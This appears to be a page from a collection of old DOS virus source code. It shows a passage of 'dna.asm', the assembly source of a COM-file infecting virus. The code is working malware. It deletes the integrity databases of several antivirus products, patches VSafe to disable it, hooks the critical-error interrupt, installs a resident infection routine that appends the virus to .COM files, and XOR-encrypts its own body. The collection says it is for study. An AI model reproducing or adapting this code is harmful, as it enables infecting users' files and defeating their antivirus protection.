
📄 dna.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
	INT     21                      ;Call DOS.
	ADD     DX,1Eh                  ;Filename pointer in DTA.
	MOV     WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
INT24:  MOV     AX,3524h                ;Get int 24 handler.
	INT     21h                     ;into [ES:BX].
	MOV     WORD PTR[BP+OLDINT],BX  ;Save it.
	MOV     WORD PTR[BP+OLDINT+2],ES;
	MOV     AH,25h                  ;Set new int 24 handler.
	LEA     DX,[BP+OFFSET NEWINT]   ;DS:DX->new handler.
	INT     21h                     ;Call DOS.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
RINT24: PUSH    DS                      ;Save data segment.
	MOV     AX,2524h                ;Restore int 24 handler
	LDS     DX,[BP+OFFSET OLDINT]   ;to original.
	INT     21h                     ;Call DOS.
	POP     DS                      ;Restore data segment.
	RET                             ;Return to caller.
;---------------------------------------------------------------------------
RINTD0: PUSH    DS                      ;Save data segment.
	MOV     AX,25D0h                ;Restore int D0 handler
	LDS     DX,[BP+OFFSET INTD0]    ;to original.
	INT     21h                     ;Call DOS.
	POP     DS                      ;Restore data segment.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
VSAFE:  MOV     AX,3516h                ;Get interrupt vector INT 16.
	INT     21h                     ;(Now we know in which segment it is.)
	ADD     BX,0364h                ;Here we find a jump that we'll change.
	CMP     WORD PTR[ES:BX],0945h   ;Is it THE jump?
	JNE     OK_9                    ;No, already modified or not resident.
	MOV     WORD PTR[ES:BX],086Dh   ;Yes, modify it.
OK_9:   RET                             ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
FIND1:  MOV     BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derived from
        MOV     BX,01h                  ; the VIENNA virus. (Why invent the 
FIND2:  PUSH    ES                      ; wheel twice?)
        PUSH    DS                      ;- Save registers.
	MOV     ES,DS:2CH               ;
	MOV     DI,0                    ;ES:DI points to environment.
FPATH:  LEA     SI,[BP+OFFSET PATH]     ;Point to "PATH=" string in data area.
	LODSB                           ;
	MOV     CX,OFFSET 8000H         ;Environment can be 32768 bytes long.
	REPNZ   SCASB                   ;Search for first character.
	MOV     CX,4                    ;Check if path
LOOP_2: LODSB                           ;is complete.
	SCASB                           ;
	JNZ     FPATH                   ;If not all there, abort & start over.
	LOOP    LOOP_2                  ;Loop to check the next character.
	XCHG    SI,DI                   ;Exchange registers.
	MOV     CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL.
	PUSH    ES                      ;\
	POP     DS                      ;-) Get DS, ES on address.
	POP     ES                      ;/
OK_14:  LEA     DI,[BP+OFFSET NEW_DTA+50];Offset address path.
OK_10:  MOVSB                           ;Get name in path.
	MOV     AL,[SI]                 ;
	CMP     AL,0                    ;Is it at the end?
	JE      OK_11                   ;Yes, replicate.
	CMP     AL,3Bh                  ;Is it ';'?
	JNE     OK_10                   ;Nope, next letter.
	INC     SI                      ;Skip past the ';' for the next loop.
	INC     BX                      ;
	LOOP    OK_14                   ;Loop until random value = 0.
OK_11:  POP     DS                      ;Restore data segment.
	MOV     AL,0                    ;Place terminating zero after the directory.
	MOV     [DI],AL                 ;
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
DELSTUF:MOV     BX,01h                  ;Set counter
	PUSH    BX                      ;and push it.
	LEA     DX,[BP+OFFSET MICRO]    ;Is there a CHKLIST.MS file?
	JMP     INTER                   ;Check it out.
SECOND: LEA     DX,[BP+OFFSET TBAV]     ;Is there a ANTI-VIR.DAT file?
	INC     BX                      ;Increase counter
	PUSH    BX                      ;and push it.
	JMP     INTER                   ;Check it out.
THIRD:  LEA     DX,[BP+OFFSET CENTRAL]  ;Is there a CHKLIST.CPS file?
	INC     BX                      ;Increase counter
	PUSH    BX                      ;and push it
INTER:  MOV     AH,4Eh                  ;Find first matching entry.
	MOV     CX,110b                 ;Include hidden and system files.
	INT     21h                     ;Call DOS.
	JC      NODEL                   ;No match, find next.
	CALL    ATTRIB                  ;Clear attributes.
	MOV     AH,41h                  ;Delete file.
	INT     21h                     ;Call DOS.
NODEL:  POP     BX                      ;Pop counter.
	CMP     BX,01                   ;Had the first one?
	JE      SECOND                  ;Yes, do the second.
	CMP     BX,02                   ;Was it the second?
	JE      THIRD                   ;Yes, do the third.
	RET                             ;Finished, return to caller.
;-----------------------------------------------------------------------------
CHDRIVE:MOV     CX,0FFFFh               ;CX=-1, so the first INC gives 0.
	MOV     BL,'A'-1                ;BL=40h
OK_15:  INC     BL                      ;BL=41h='A' on first pass.
	INC     CX                      ;CX=0 on first pass (drive A).
	CMP     BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
	JNE     OK_15                   ;Not the same, go again.
	MOV     DL,CL                   ;Calculated the new drive code.
	MOV     AH,0Eh                  ;Select new default drive.
	INT     21h                     ;Call DOS.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
RTIME:  MOV     AX,5701h                ;Restore time & date.
	MOV     CX,WORD PTR[BP+OFFSET TIME];Old time.
	MOV     DX,WORD PTR[BP+OFFSET DATE];Old date.
	INT     21h                     ;Call DOS.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
STIME:  MOV     AX,5700h                ;Get file date & time.
	MOV     BX,[BP+OFFSET HANDLE]   ;File Handle.
	INT     21h                     ;Call DOS.
	MOV     WORD PTR[BP+OFFSET TIME],CX;Store time.
	MOV     WORD PTR[BP+OFFSET DATE],DX;Store date.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
BPOINT: XOR     DX,DX                   ;Zero register.
	MOV     AX,4202h                ;Move file pointer to end of file.
	XOR     CX,CX                   ;Zero register.
	INT     21h                     ;Call DOS.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
ATTRIB: MOV     DX,WORD PTR[BP+OFFSET NP];Offset in DTA.
	MOV     AX,4300h                ;Ask file attributes.
	INT     21h                     ;Call DOS.
	LEA     BX,[BP+OFFSET ATTR]     ;Save address for old attributes.
	MOV     [BX],CX                 ;Save it.
	XOR     CX,CX                   ;Clear file attributes.
	MOV     AX,4301h                ;Write file attributes.
	INT     21h                     ;Call DOS.
	JNC     OK                      ;No error, proceed.
	CALL    EXIT                    ;Oh Oh, error occurred. Quit.
OK:     RET                             ;Return to caller.
;-----------------------------------------------------------------------------
RATTRIB:LEA     DX,[BP+OFFSET NEWNAM]   ;Offset file specification.(name.TXT)
	LEA     BX,[BP+OFFSET ATTR]     ;Offset address old attributes.
	MOV     CX,[BX]                 ;Into CX.
	MOV     AX,4301h                ;Write old values back.
	INT     21h                     ;Call DOS.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
GODIR:  LEA     DX,[BP+OFFSET NEW_DTA+52];Offset directory spec.
	MOV     AH,3Bh                  ;Goto the directory.
	INT     21h                     ;Call DOS.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
RANDOM: CALL    CHKTIME                 ;Get system time.
	MOV     CX,0                    ;Figure this out by yourself.
	MOV     AX,100d                 ;It is a random generator with
OK_19:  INC     CX                      ;two variable inputs.
	SUB     AX,BX                   ;A: How many dir's in the path.
        CMP     AX,01d                  ;B: Random system time.
	JGE     OK_19                   ;With this values, we create a
	XOR     BX,BX                   ;random value between 1 and A.
OK_20:  INC     BX                      ;
	SUB     DL,CL                   ;
	CMP     DL,01d                  ;
	JGE     OK_20                   ;
	MOV     BYTE PTR[BP+OFFSET VAL_2],BL;Save value.
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
BEGIN1: PUSH    SP                      ;
	POP     BX                      ;Everything is related to BP.
	MOV     BP,WORD PTR[BX]         ;
	SUB     BP,0145h                ;In first run BP=0
	RET                             ;
;-----------------------------------------------------------------------------
NEWINT: MOV     AL,03h                  ;New INT 24.
	IRET                            ;No more write protect errors!
;-----------------------------------------------------------------------------
INSTSR2:PUSH    ES                      ;-Save registers.
	PUSH    DS                      ;/
	MOV     AX,0DEDEh               ;Resident check.       
	INT     21h                     ;Call DOS.       
	CMP     AH,41h                  ;\
	JNE     NOBRO                   ;-Little Brother virus in memory?
	CALL    EXIT4			;If resident, do nothing.
NOBRO:  MOV	AX,3D3Dh		;Resident check.
	INT	21h			;Call DOS.
	CMP	AX,1111h		;\
	JNE	NOGETP			;-Getpass! virus resident ?.
	CALL	EXIT4			;If resident, quit.
NOGETP:	MOV     AX,35D0h                ;Save old interrupt vector INT D0. 
	INT     21h                     ;Call DOS.
	MOV     WORD PTR[BP+OFFSET INTD0],BX
	MOV     WORD PTR[BP+OFFSET INTD0+2],ES
	MOV     AX,0044h                ;
	MOV     ES,AX                   ;       
	MOV     DI,0100h                ;
	LEA     SI,[BP+OFFSET INFECT]   ;Offset address infection routine.
	MOV     CX,TSR2LEN              ;Length to install.
	REP     MOVSB                   ;Install it.
	PUSH    ES                      ;
	POP     DS                      ;
	MOV     AX,25D0h                ;Set new INT D0 vector.
	MOV     DX,0100h                ;
	INT     21h                     ;Call DOS.
	POP     DS                      ;
	POP     ES                      ;
	RET                             ;Return to caller.
;-----------------------------------------------------------------------------
PATH    DB      'PATH='                 ;Used to find environment.
SPEC    DB      '*.COM',0               ;File search specification.
TXT     DB      '.TXT',0                ;Rename file specification.
OUTPUT  DB      0                       ;Output byte to printer.
TXTPOI  DW      0                       ;Pointer in specification.
MARK1   DB      0                       ;Used for infection check.
VAL_2   DB      0                       ;Random value for directory switching.
OLDRV   DB      0                       ;Old drive code.
BEGIN2  DW      0                       ;
NWJMP1  DB      0EBh,0                  ;
FLAGT   DB      0                       ;
COMMND  DB      'COMM',0                ;
MICRO   DB      'CHKLIST.MS',0          ;- Files to be deleted.
CENTRAL DB      'CHKLIST.CPS',0         ;/
TBAV    DB      'ANTI-VIR.DAT',0        ;/
VIRNAME DB      ' Wrong copied DNA = Evolution '
	DB      ' I am Life.'
	DB      ' Greetings ,ThE wEiRd GeNiUs '
OLD_DTA DW      0                       ;Old DTA address.
HANDLE  DW      0                       ;File handle.
COMSIGN DB	0			;Command.com flag
TIME    DB      2 DUP (?)               ;File time.
DATE    DB      2 DUP (?)               ;File date.
ATTR    DB      1 DUP (?),0             ;Attributes.
INTD0   DW      0,0                     ;       
NEWJMP  DB      0E9h,0,0                ;Jump replacement.
ORIGNL  DB      0CDh,020h,090h          ;Original instructions.
DEXIT   DB      0CDh,020h,090h          ;Dummy exit instructions.
NEWNAM  DB      0Dh DUP (?)             ;New file name.
OLDINT  DW      0                       ;Old INT 24 vector.
NP      DW      ?                       ;New DTA address.
;-----------------------------------------------------------------------------
INFECT: PUSH    BX                      ;Save file handle.
	PUSH    DX                      ;Save encryption key.
	PUSH    BX                      ;Save file handle.
	CALL    DNCRYPT                 ;Encrypt the virus code.
	POP     BX                      ;Restore file handle.
	LEA     DX,[BP+OFFSET VSTART]   ;Begin here.
	MOV     CX,VIRLEN               ;Write this many Bytes.
	MOV     AH,40h                  ;Write to file.
	INT     21h                     ;Call DOS.
	POP     DX                      ;Restore encryption value.
	CALL    DNCRYPT                 ;Fix up the mess.
	POP     BX                      ;Restore file handle.
DUMMY:  IRET                            ;Return to caller.
;-----------------------------------------------------------------------------
DNCRYPT:LEA     BX,[BP+OFFSET CSTART]   ;De/en-crypt from here.
	MOV     DH,DL                   ;
	MOV     CX,CRYPTLEN             ;Set counter.
Y_LOOP: XOR     [BX],DL                 ;Xor the code on address BX.
	SUB     DL,DH                   ;-To change form of scrambled code.
	SUB     DH,02Eh                 ;/
	INC     BX                      ;Increase address.
	LOOP    Y_LOOP                  ;Repeat until done.
NOTENC: RET                             ;Return to caller.
;-----------------------------------------------------------------------------
BUFFER: DB      64 DUP (?)              ;Here we store directory info.
;-----------------------------------------------------------------------------
NEW_DTA:                                ;Here we put the DTA copy.
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================
